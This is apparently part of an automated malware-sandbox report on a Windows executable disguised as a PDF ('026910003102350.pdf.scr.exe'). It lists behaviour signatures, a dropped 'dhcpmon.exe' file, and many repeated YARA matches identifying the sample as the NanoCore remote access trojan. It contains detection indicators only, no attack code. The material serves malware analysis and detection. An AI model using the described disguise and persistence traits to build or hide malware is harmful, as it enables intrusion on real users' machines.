Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00337DDA	2_2_00337DDA

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

2_2_00371A91

Tries to load missing DLLs

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50

Uses 32bit PE files

Source: 026910003102350.pdf.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
